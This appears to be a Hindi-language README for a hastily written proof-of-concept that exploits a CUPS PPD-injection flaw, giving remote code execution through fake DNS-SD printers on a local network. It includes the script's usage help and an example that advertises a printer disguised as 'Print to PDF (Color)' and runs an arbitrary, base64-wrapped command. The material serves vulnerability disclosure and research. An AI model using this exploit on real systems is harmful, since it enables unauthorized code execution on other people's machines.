
हालिया CUPS शोषण के लिए त्वरित प्रूफ-ऑफ-कॉन्सेप्ट, जो PPD इंजेक्शन और DNS-SD प्रिंटर खोज के माध्यम से रिमोट कोड निष्पादन सक्षम बनाता है। कमजोर यूनिक्स सिस्टम पर मनमाने कमांड निष्पादित करता है।
हाल के CUPS एक्सप्लॉइट के लिए एक त्वरित प्रूफ ऑफ कॉन्सेप्ट। मैं इसे और अधिक साफ करने की योजना बना रहा था, लेकिन एम्बार्गो उम्मीद से कहीं पहले हटा लिया गया, इसलिए कोड थोड़ा जल्दबाजी में लिखा गया है।
सभी तकनीकी विवरणों के लिए आपको सच में Evilsocket का राइटअप ही पढ़ना चाहिए।
यह एक्सप्लॉइट सार्वजनिक OpenPrinting CUPS रिपॉजिटरी में इस कमिट को देखने के बाद लिखा गया था। संभवतः इससे बेहतर इंजेक्शन पॉइंट भी मौजूद हैं।
यह PoC dns-sd प्रिंटर डिस्कवरी का उपयोग करता है, इसलिए टारगेट को ब्रॉडकास्ट संदेश प्राप्त करने में सक्षम होना चाहिए, यानी उसे उसी नेटवर्क पर होना चाहिए।
यह एक्सप्लॉइट zeroconf और ippserver का उपयोग करता है, दोनों को pip के माध्यम से इंस्टॉल किया जा सकता है।
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT] [--base64 | --no-base64]
A CUPS PPD injection PoC
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
--base64, --no-base64
Wrap the command in base64 (default: enabled)
उदाहरण के लिए:
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3